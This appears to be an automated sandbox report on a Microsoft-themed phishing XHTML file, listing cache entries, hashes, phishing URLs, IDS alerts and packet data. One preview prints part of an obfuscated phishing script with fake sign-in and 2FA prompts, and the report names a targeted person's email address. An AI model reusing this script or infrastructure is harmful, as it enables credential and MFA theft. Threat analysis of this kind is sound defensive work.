	https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6E03jJF3YxTMCgxElFH-2Bjnu2oS6ZdGJGXf9TKr37Eh3pnVym0G5ilxnSN6bJyz-2FWbi47cL6vQDH-2FLX6HDdsxLQr4OiWNyplfwZIjGldJH3Oj3k-2B0Sr92pyHOs07I3QG9CN9BFC52s0blv8XoiBzACqb7MDZTgdhgx-2Fj3fdHjRUqn0E0aUxawEH-2F-2B7SQiAWk4bi4jHEXI-3DlKA5_AMa9RrBWZfrIG11ZEW0ArF1BRI9e8rcrPZr5T9DlZ7Ba2ZAvuJPwiS8cX4aFrXjFerUDwGcfFdNk6Ly7G30W-2FpJZ3vwwQM6aCBocvejnros7-2FYckwVQH02a6C13hCOZXCH6DxRozn9HOBenC-2BdqPCIwBV1vvkSKYyJjB4wo2MVyi5b4Ko6F9xhTiwowhGgTSo1JEnvhUu4BAFpCuBdmsFw-3D-3D	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	1099-NEC.pdf	Get hash	malicious	RHADAMANTHYS	Browse	151.101.1.229

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 44

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Reputation:	low
URL:	https://i.imgur.com/KAb5SEy.png
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 45

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 46

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	68421
Entropy (8bit):	4.894536009060081
Encrypted:	false
SSDEEP:	768:PONTtTOT+ThzdO31GqjkKB6wI7JoHHy6BKJwhXBXoXRn2CVWpgnEDUgUoCn4CSaF:PON5yChyB6F5/VW4HllbJ
MD5:	F2F583442D65E7C1F128058C8FFCB56C
SHA1:	C57E539A499731EB07554EC0BD599570ED3D5E01
SHA-256:	D6112E098070CCAF1E7F400CA632F3298780461C7E2C67203DA16676F6E1EAC0
SHA-512:	859C8833253172C5B6331DB9C68F8C16268E0F443689E2EF62BBB018F1835AC688C31E3E2A71C55A09E92C89ED101745665CE901328AA02D4F440A627751BE5A
Malicious:	false
Reputation:	low
URL:	https://office.avcbtech.store/muk/xls/m1u2k.js?uid=bfrieden@cosb.org
Preview:	function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	21
Entropy (8bit):	3.594465636961452
Encrypted:	false
SSDEEP:	3:YMb1gXME2Y:YMeX32Y
MD5:	909AD59B6307B0CD8BFE7961D4B98778
SHA1:	49F8111D613317EA86C6A45CD608DC96B1C8451B
SHA-256:	FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
SHA-512:	8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
Malicious:	false
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"8.46.123.189"}

Chrome Cache Entry: 48

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
URL:	https://i.imgur.com/0HdPsKK.png
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 51

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.594465636961452
Encrypted:	false
SSDEEP:	3:YMb1gXME2Y:YMeX32Y
MD5:	909AD59B6307B0CD8BFE7961D4B98778
SHA1:	49F8111D613317EA86C6A45CD608DC96B1C8451B
SHA-256:	FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
SHA-512:	8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
Malicious:	false
Preview:	{"ip":"8.46.123.189"}

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.874716892449736
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	Play_VM-Now(bfrieden)VWAV.xhtml
File size:	3'451 bytes
MD5:	4ec819c3f14bf6fc398dfb01b82a1054
SHA1:	bd48616106a33e2cfb81279e3dc236244c843be1
SHA256:	38d574361c4c881e32d4c2ef098b77795ea38559fca60dbd7f20cd694399837b
SHA512:	0faa21c1f7efac4059ff1517338c4fb4bc47fc7fa35196b031dc1f0674a5973d01bbcca3eba862baeaf044fb4be72e169371b9699f3eb26219728d65eb5b8646
SSDEEP:	48:3VmIAqyIFwQrzUttDwG6TOc0E+yWv3icFGKL2lLJ+pCOC4+bZBk:VAmKj6F06WoZPw
TLSH:	CD61526A189584608535C2975FAFE71AEF1102572329C248FBEDFB175FB2E00C4A76DC
File Content Preview:	...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-

Static OLE Info

General

Document Type:	Text
Number of OLE Files:	1

OLE File "Play_VM-Now(bfrieden)VWAV.xhtml"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-17T22:35:29.378727+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	60846	104.168.138.190	443	TCP
2025-03-17T22:35:40.593257+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	60850	104.168.138.190	443	TCP
2025-03-17T22:36:01.755193+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	60855	104.168.138.190	443	TCP
2025-03-17T22:36:32.007902+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.24	63143	104.168.138.190	443	TCP

Network Port Distribution

Total Packets: 370
• 8254 undefined
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 22:34:56.572709084 CET	60828	443	192.168.2.24	142.250.186.132
Mar 17, 2025 22:34:56.572748899 CET	443	60828	142.250.186.132	192.168.2.24
Mar 17, 2025 22:34:56.572844028 CET	60828	443	192.168.2.24	142.250.186.132
Mar 17, 2025 22:34:56.572992086 CET	60828	443	192.168.2.24	142.250.186.132
